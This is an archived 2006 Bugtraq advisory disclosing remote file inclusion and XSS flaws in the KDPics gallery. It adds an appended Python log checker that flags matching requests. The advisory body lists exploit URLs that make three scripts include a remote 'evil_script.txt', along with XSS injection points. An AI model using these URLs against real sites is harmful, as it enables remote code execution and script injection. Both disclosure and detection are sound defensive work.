Open Source and information security mailing list archives
Message-ID: <20061209084503.26524.qmail@securityfocus.com>
Date: 9 Dec 2006 08:45:03 -0000
From: mr_kaliman@....com
To: bugtraq@...urityfocus.com
Subject: KDPics Multiple Vulnerabilities

KDPics 1.16 and prior
--------------------

Vendor site: http://www.kdland.org/kdpics/
Product: KDPics <= 1.16
Vulnerability: Remote File Inclusion Vulnerability & XSS
Credits: Mr_KaLiMaN
Reported to Vendor: 30.11.06
Public disclosure: 09.12.06

Description:
------------

Remote File Inclusion Vulnerability:

http://[victim]/[kdpics_path]/index.php3?page=http://evil_script.txt?
http://[victim]/[kdpics_path]/authenticate.inc.php3?lib_path=http://evil_script.txt?
http://[victim]/[kdpics_path]/lib/exifer/exif.php?lib_path=http://evil_script.txt?

XSS:

http://[victim]/[kdpics_path]/index.php3?page=galeries&categories=[XSS]
http://[victim]/[kdpics_path]/galeries.inc.php3?categories=[XSS]
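
Added example, not part of the original post or of KDPics: a log check that flags requests matching the script and parameter pairs listed in the advisory above. The access-log format, the helper name classify() and all sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script -> parameter pairs named in the advisory.
RFI_PARAMS = {"index.php3": "page",
              "authenticate.inc.php3": "lib_path",
              "lib/exifer/exif.php": "lib_path"}
XSS_PARAMS = {"index.php3": "categories",
              "galeries.inc.php3": "categories"}

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
URL_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)  # http://, ftp://, ...
MARKUP = re.compile(r"[<>\"']")

def classify(log_line):
    """Return (kind, script, parameter) tuples for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    path = unquote(target.path).lower()
    findings = []
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; decode again for %25xx
        for script, param in RFI_PARAMS.items():
            if name == param and path.endswith("/" + script) and URL_SCHEME.match(value):
                findings.append(("rfi", script, param))
        for script, param in XSS_PARAMS.items():
            if name == param and path.endswith("/" + script) and MARKUP.search(value):
                findings.append(("xss", script, param))
    return findings

# Constructed sample lines; addresses, hosts and the /kdpics/ path are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Dec/2006:09:00:01 +0000] '
    '"GET /kdpics/index.php3?page=http://host.invalid/x.txt? HTTP/1.1" 200 512',
    '192.0.2.10 - - [09/Dec/2006:09:00:02 +0000] '
    '"GET /kdpics/lib/exifer/exif.php?lib_path=http%253A%252F%252Fhost.invalid%252Fx.txt HTTP/1.1" 200 90',
    '192.0.2.11 - - [09/Dec/2006:09:00:03 +0000] '
    '"GET /kdpics/galeries.inc.php3?categories=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 700',
    '192.0.2.12 - - [09/Dec/2006:09:00:04 +0000] '
    '"GET /kdpics/index.php3?page=galeries&categories=vacances HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), line.split('"')[1])
```

The last sample line is an ordinary gallery request and produces no finding; the second shows why the value is decoded twice before matching.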